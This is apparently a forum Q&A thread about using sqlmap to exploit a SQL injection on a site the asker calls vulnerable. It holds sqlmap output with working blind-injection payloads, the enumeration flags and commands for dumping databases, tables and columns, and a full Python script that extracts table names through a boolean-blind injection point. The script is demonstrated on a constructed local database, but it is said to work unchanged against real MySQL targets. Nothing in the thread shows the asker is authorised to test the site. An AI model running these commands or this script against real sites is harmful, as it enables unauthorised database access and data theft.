Testing for SQL injection with sqlmap

information security, application security, sql injection, vulnerability scanner
2021-09-04 18:18:39

I have just started using sqlmap to test for possible SQL injection attacks.

I have a vulnerable website:

C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1

[*] starting at: 19:33:27

[19:33:27] [INFO] using 'xxx\session' as session file
[19:33:27] [INFO] testing connection to the target url
[19:33:31] [INFO] testing if the url is stable, wait a few seconds
[19:33:33] [INFO] url is stable
[19:33:33] [INFO] testing if GET parameter 'id' is dynamic
[19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
[19:33:34] [INFO] GET parameter 'id' is dynamic
[19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[19:33:35] [INFO] testing sql injection on GET parameter 'id'
[19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3404=3404

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[19:34:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.15
back-end DBMS: MySQL 5.0.11
[19:34:55] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 21 times
[19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'

[*] shutting down at: 19:34:55

Now I would like to know whether I can view all the tables in the database.

What do I have to type on the command line to check this?

2 Answers

What you are looking for is called enumeration.

Reading the SQLMap manual under the enumeration topic gave me the following:

  • --dbs for databases
  • --tables for tables
  • --columns for columns

There is a lot of other useful information in the manual, so if you have more questions about the flags and parameters the tool takes, I recommend reading it.

I have added a blog post here on enumeration with SQLMap: http://www.securesolutions.no/enumeration-with-sqlmap/
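As an added example (not code from the question, this answer, or sqlmap itself), the following Python script shows what `--tables` has to do underneath when the only usable injection point is the boolean-based blind one reported in the log above: it recovers every table name by asking yes/no questions through the `id` parameter and comparing each response with the page returned for sqlmap's own `1 AND 3404=3404` payload. The target and its database are constructed in memory; SQLite stands in for the MySQL backend and `sqlite_master` for MySQL's `information_schema.tables`, and `Target`, `build_db` and the table names are assumptions made for this illustration, not anything from the original site. The same loop over `information_schema` is what runs against a real MySQL target.

```python
import sqlite3

# Added example, not sqlmap's own code. SQLite stands in for the MySQL backend
# and sqlite_master for information_schema.tables; all data here is constructed.


def build_db():
    """Constructed in-memory database playing the part of the target's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT);"
        "CREATE TABLE orders(id INTEGER PRIMARY KEY, total REAL);"
        "INSERT INTO users VALUES (1,'alice'),(2,'bob');"
        "INSERT INTO orders VALUES (1, 9.5);"
    )
    return conn


class Target:
    """Hypothetical stand-in for page.php?id=...: the id parameter is concatenated
    straight into the query, which is the class of bug sqlmap reported."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # how many "HTTP requests" the enumeration costs

    def get(self, id_param):
        self.requests += 1
        sql = "SELECT name FROM users WHERE id=" + id_param
        try:
            rows = self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            return "error"  # stand-in for an HTTP 500 / empty page
        return "Hello " + rows[0][0] if rows else "No such user"


def oracle(target, condition, true_page):
    """Boolean-based blind oracle: the page looks like the 'true' page
    (id=1 AND 3404=3404) exactly when the injected condition holds."""
    return target.get(f"1 AND ({condition})") == true_page


def extract_string(target, subquery, true_page, maxlen=64):
    """Recover the single string `subquery` returns, one character per binary search."""
    out = ""
    for pos in range(1, maxlen + 1):
        # stop once the string has no character at this position
        if not oracle(target, f"LENGTH(({subquery})) >= {pos}", true_page):
            break
        lo, hi = 0, 127  # ASCII search space; ~7 requests per character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(target, f"UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid}", true_page):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def enumerate_tables(target):
    """What --tables does underneath on a boolean-blind injection point."""
    true_page = target.get("1 AND 3404=3404")  # sqlmap's own payload from the log
    # 1. count the tables
    count = 0
    while oracle(target,
                 f"(SELECT COUNT(*) FROM sqlite_master WHERE type='table') > {count}",
                 true_page):
        count += 1
    # 2. pull each name out in a stable order, one character at a time
    names = []
    for i in range(count):
        sub = (f"SELECT name FROM sqlite_master WHERE type='table' "
               f"ORDER BY name LIMIT 1 OFFSET {i}")
        names.append(extract_string(target, sub, true_page))
    return names


if __name__ == "__main__":
    t = Target(build_db())
    print(enumerate_tables(t), "recovered in", t.requests, "requests")
```

Run it and look at the request count: even two short table names cost on the order of a hundred probes, which is why sqlmap prefers UNION and error-based techniques whenever it finds them and falls back to blind extraction only when it has to. It also explains why the `403 (Forbidden) - 21 times` warning in the log matters: something in front of the application is rejecting a share of the probes, and a blind oracle that compares responses page for page becomes unreliable as soon as some of its true and false answers are replaced by a block page.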

Oh, you were so close, it's

./sqlmap.py -u http://example.com --tables